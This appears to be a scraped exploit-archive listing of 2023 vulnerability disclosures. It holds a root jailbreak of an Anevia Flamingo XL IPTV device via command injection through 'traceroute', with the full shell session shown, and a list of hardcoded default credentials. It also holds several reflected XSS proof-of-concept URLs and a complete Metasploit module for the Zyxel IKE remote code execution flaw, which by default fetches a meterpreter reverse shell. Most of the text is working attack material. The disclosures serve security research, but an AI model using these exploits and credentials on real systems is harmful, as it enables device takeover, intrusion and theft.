Anevia Flamingo XL version 3.2.9 suffers from an SSH sandbox escape via the use of traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.

  
Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak

Vendor: Ateme  
Product web page: https://www.ateme.com  
Affected version: 3.2.9  
                  Hardware revision 1.0  
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end  
product for hospitality and corporate markets. Flamingo XL captures  
live TV and radio content from satellite, cable, digital terrestrial  
and analog sources before streaming it over IP networks to STBs, PCs  
or other IP-connected devices. The Flamingo XL is based upon a modular  
4U rack hardware platform that allows hospitality and corporate video  
service providers to deliver a mix of channels from various sources  
over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets  
dropped into a sandboxed environment using the login binary that  
allows specific set of commands. One of those commands that can be  
exploited to escape the jailed shell is traceroute. A remote attacker  
can breakout of the restricted environment and have full root access  
to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)  
           Apache/2.2.15 (Unix)  
           mod_ssl/2.2.15  
           OpenSSL/0.9.8g  
           DAV/2  
           PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2023-5780  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php

13.04.2023

--

$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1  
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.  
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes  
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.  
Anevia Flamingo XL  
root@192.168.1.1's password:  
Primary-XL> help  
available commands:  
  bonding  
  config  
  date  
  dns  
  enable  
  ethconfig  
  exit  
  exp  
  firewall  
  help  
  hostname  
  http  
  igmpq  
  imp  
  ipconfig  
  license  
  log  
  mail  
  passwd  
  persistent_logs  
  ping  
  reboot  
  reset  
  route  
  serial  
  settings  
  sslconfig  
  tcpdump  
  timezone  
  traceroute  
  upgrade  
  uptime  
  version  
  vlanconfig

Primary-XL> tcpdump ;id  
tcpdump: illegal token: ;  
Primary-XL> id  
unknown command id  
Primary-XL> whoami  
unknown command whoami  
Primary-XL> ping ;id  
ping: ;id: Host name lookup failure  
Primary-XL> traceroute ;id  
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]  
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]  
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"  
Options:  
        -F      Set the don't fragment bit  
        -I      Use ICMP ECHO instead of UDP datagrams  
        -l      Display the ttl value of the returned packet  
        -d      Set SO_DEBUG options to socket  
        -n      Print hop addresses numerically rather than symbolically  
        -r      Bypass the normal routing tables and send directly to a host  
        -v      Verbose output  
        -m max_ttl      Set the max time-to-live (max number of hops)  
        -p port#        Set the base UDP port number used in probes  
                (default is 33434)  
        -q nqueries     Set the number of probes per ``ttl'' to nqueries  
                (default is 3)  
        -s src_addr     Use the following IP address as the source address  
        -t tos  Set the type-of-service in probe packets to the following value  
                (default 0)  
        -w wait Set the time (in seconds) to wait for a response to a probe  
                (default 3 sec)  
        -g      Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)  
Primary-XL> version  
Software Revision: Anevia Flamingo XL v3.2.9  
Hardware Revision: 1.0  
(c) Anevia 2003-2012  
Primary-XL> traceroute ;sh  
...  
...  
whoami  
root  
id  
uid=0(root) gid=0(root) groups=0(root)  
ls -al  
drwxr-xr-x   19 root     root         1024 Oct  3  2022 .  
drwxr-xr-x   19 root     root         1024 Oct  3  2022 ..  
drwxr-xr-x    2 root     root         1024 Oct 21  2013 bin  
drwxrwxrwt    2 root     root           40 Oct  3  2022 cores  
drwxr-xr-x   13 root     root        27648 May 22 00:53 dev  
drwxr-xr-x    3 root     root         1024 Oct 21  2013 emul  
drwxr-xr-x   48 1000     1000         3072 Oct  3  2022 etc  
drwxr-xr-x    3 root     root         1024 Oct  3  2022 home  
drwxr-xr-x   11 root     root         3072 Oct 21  2013 lib  
lrwxrwxrwx    1 root     root           20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib  
lrwxrwxrwx    1 root     root            3 Oct 21  2013 lib64 -> lib  
drwx------    2 root     root        12288 Oct 21  2013 lost+found  
drwxr-xr-x    4 root     root         1024 Oct 21  2013 mnt  
drwxrwxrwt    2 root     root           80 May 22 00:45 php_sessions  
dr-xr-xr-x  177 root     root            0 Oct  3  2022 proc  
drwxr-xr-x    4 root     root         1024 Oct 21  2013 root  
drwxr-xr-x    2 root     root         2048 Oct 21  2013 sbin  
drwxr-xr-x   12 root     root            0 Oct  3  2022 sys  
drwxrwxrwt   26 root     root         1140 May 22 01:06 tmp  
drwxr-xr-x   10 1000     1000         1024 Oct 21  2013 usr  
drwxr-xr-x   14 root     root         1024 Oct 21  2013 var

ls /var/www/admin  
_img                           configuration.php              log_securemedia.php            stream_dump.php  
_lang                          cores_and_logs_management.php  login.php                      stream_services  
_lib                           dataminer_handshake.php        logout.php                     streaming.php  
_style                         dvbt.php                       logs.php                       support.php  
about.php                      dvbt_scan.php                  main.php                       template  
ajax                           export.php                     manager.php                    time.php  
alarm.php                      fileprogress.php               network.php                    toto.ts  
alarm_view.php                 firewall.php                   pear                           upload_helper.php  
authentication.php             get_config                     power.php                      uptime.php  
bridges.php                    get_enquiry_pending.php        read_settings.php              usbloader.php  
cam.php                        get_upgrade_error.php          receive_helper.php             version.php  
channel.php                    heartbeat.php                  rescrambling                   webradio.php  
channel_xl_list.php            include                        rescrambling.php               webtv  
check_state                    input.php                      resilience                     webtv.php  
class                          js                             resilience.php                 xmltv.php  
common                         license.php                    restart_service.php  
config_snmp.php                log.php                        set_oem.php

python -c 'import pty; pty.spawn("/bin/bash")'  
root@Primary-XL:/# cd /usr/local/bin  
root@Primary-XL:/usr/local/bin# ls -al login  
-rwxr-xr-x    1 root     root        35896 Feb 21  2012 login  
root@Primary-XL:/usr/local/bin# cd ..  
root@Primary-XL:/usr/local# ls commands/  
bonding          firewall         mail             timezone  
config           help             passwd           traceroute  
date             hostname         persistent_logs  upgrade  
dbg-serial       http             ping             uptime  
dbg-set-oem      igmpq            route            version  
dbg-updates-log  imp              serial           vlanconfig  
dns              ipconfig         settings  
ethconfig        license          sslconfig  
exp              log              tcpdump  
root@Primary-XL:/usr/local# exit  
exit  
Primary-XL> enable  
password:  
Primary-XL# ;]

Anevia Flamingo XL 3.2.9 Remote Root Jailbreak

Anevia Flamingo XL/XS versions 3.6.20 and 3.2.9 have a weak set of default and hardcoded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

    Anevia Flamingo XL/XS 3.6.x Default/Hard-coded CredentialsVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.20, 3.2.9                  Hardware revision 1.1, 1.0                  SoapLive 2.4.1, 2.0.3                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The device uses a weak set of default and hard-coded administrativecredentials that can be easily guessed in remote password attacks andgain full control of the system.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5777Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php13.04.2023--SSH: root:aneviaSSH: enable:parisWEB: admin:parisWEB: monitor:aneviaOEM: monitor:aneviaOEM: monitor:telesteOEM: monitor:envivioOEM: monitor:blankom

Anevia Flamingo XL/XS 3.6.x Default / Hardcoded Credentials 

OmniCart version 3.4.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32794/ - Pixobit Solutions                  ││  Vendor   : OmniCart - https://omnicartshop.com/                                       ││  Software : OmniCart 3.4.0                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /GET parameter 'lang' is vulnerable to RXSShttps://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1Path: /index.php/searchGET parameter 'search' is vulnerable to RXSShttps://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1[-] Done

OmniCart 3.4.0 Cross Site Scripting

LearnDesk version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/35390/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : LearnDesk 1.0                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ebook-detailsGET parameter 'eBook' is vulnerable to RXSShttps://website/ebook-details?eBook=2-20230526090815bgijo"><script>alert(1)</script>nq0d9[-] Done

LearnDesk 1.0 Cross Site Scripting

Expert X Jobs Portal And Resume Builder version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/36326/                                      ││  Vendor   : wvidesk.com                                                                ││  Software : Expert X Jobs Portal And Resume Builder 1.0                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /companiesGET parameter 'listed' is vulnerable to RXSShttp://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvhPath: /search-fieldGET parameter 'pos_ref' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj Path: /search-fieldGET parameter 'frmPositionCountry' is vulnerable to RXSShttp://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0[-] Done

Expert X Jobs Portal And Resume Builder 1.0 Cross Site Scripting

Movierocket version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32650/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Movierocket 1.0                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /search_catalogGET parameter 'keywords' is vulnerable to RXSShttps://website/search_catalog?keywords=sz83n<script>alert(1)</script>k8jqbPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=bol85"><script>alert(1)</script>fdg21 [-] Done

Movierocket 1.0 Cross Site Scripting

This Metasploit module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The affected devices are vulnerable in a default configuration and command execution is with root privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = GreatRanking  include Msf::Exploit::Remote::Udp  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange          (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are          as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),          VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The          affected devices are vulnerable in a default configuration and command execution is with root privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'sf', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-28771'],          ['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'],          ['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls']        ],        'DisclosureDate' => '2023-03-31',        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as 'root'        'DefaultOptions' => {          # We default to a meterpreter payload delivered via a fetch HTTP adapter.          # Another good payload choice is cmd/unix/reverse_bash.          'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp',          'FETCH_WRITABLE_DIR' => '/tmp',          'FETCH_COMMAND' => 'CURL'        },        'Targets' => [ [ 'Default', {} ] ],        'DefaultTarget' => 0,        'Notes' => {          # The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart.          'Stability' => [CRASH_SERVICE_RESTARTS],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(500)      ]    )  end  def check    connect_udp    # Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can    # expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message.    # In a default configuration, there appears no known method to identify the platform vendor or version    # number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown.    # If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we    # still would not be able to identify the version number of the target service.    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI    ikev2_header << [0].pack('C') # Next Payload: None - 0    ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10)    ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2    ikev2_header << [0].pack('C') # Flags: None - 0    ikev2_header << [0].pack('N') # ID: 0    ikev2_header << [ikev2_header.length + 4].pack('N') # Length    udp_sock.put(ikev2_header)    ikev2_reply = udp_sock.get(udp_sock.def_read_timeout)    disconnect_udp    if !ikev2_reply.empty? && (ikev2_reply.length >= 40) &&       # Ensure the response 'Initiator SPI' field is the same as the original one sent.       (ikev2_reply[0, 8] == ikev2_header[0, 8]) &&       # Ensure the 'Next Payload' field is Notification (11)       (ikev2_reply[16, 1].unpack('C').first == 11 &&         # Ensure the 'Exchange Type' field is Informational (5)         (ikev2_reply[18, 1].unpack('C').first == 5)) &&       # Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16)       (ikev2_reply[38, 2].unpack('n').first == 16)      return CheckCode::Detected('IKE detected but device vendor and service version are unknown.')    end    CheckCode::Unknown  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    connect_udp    cmd_injection = "\";bash -c \"#{cmd}\";echo -n \""    # This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the    # log file. As such the decoded value must not have any null terminator values as these will break our command    # payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd    # injection payload to work as expected.    haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB'    ikev2_payload = [0].pack('C') # Next Payload: None - 0    ikev2_payload << [0].pack('C') # Reserved: 0    ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data    ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1    ikev2_payload << [0].pack('C') # SPI Size: None - 0    ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E)    ikev2_payload << haxb48 + cmd_injection # Notification Data    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI    ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29)    ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20)    ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22)    ikev2_header << [8].pack('C') # Flags: Initiator - 8    ikev2_header << [0].pack('N') # ID: 0    ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length    packet = ikev2_header << ikev2_payload    udp_sock.put(packet)    disconnect_udp  endend

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution

Codemonkey Multi Vendor Digital Product Mart version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/39478/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Codemonkey Multi Vendor Digital Product Mart 1.0                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'keyword' is vulnerable to RXSShttps://website/search?keyword=ohv4i<script>alert(1)</script>f6pt8&category=allPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=vp6bx"><script>alert(1)</script>ik2tx[-] Done

Codemonkey Multi Vendor Digital Product Mart 1.0 Cross Site Scripting

Scriptio version 1.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/39492/ -  https://mybizcms.com/             ││  Vendor   : Emporium                                                                   ││  Software : Scriptio 1.4 (An online text scripts sharing and selling platform)         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJobd     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'pg' is vulnerable to RXSShttps://website/search?q=&pg=ohv4i<script>alert(1)</script>f6pt8[-] Done

Scriptio 1.4 Cross Site Scripting

EasyAnswer version 1.0.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/40311/                                      ││  Vendor   : Promofile                                                                  ││  Software : EasyAnswer 1.0.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJobd     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /loginGET parameter 'redirect' is vulnerable to RXSShttps://website/login?redirect=afrsa"><script>alert(1)</script>htxuo[-] Done

Tag

#ssh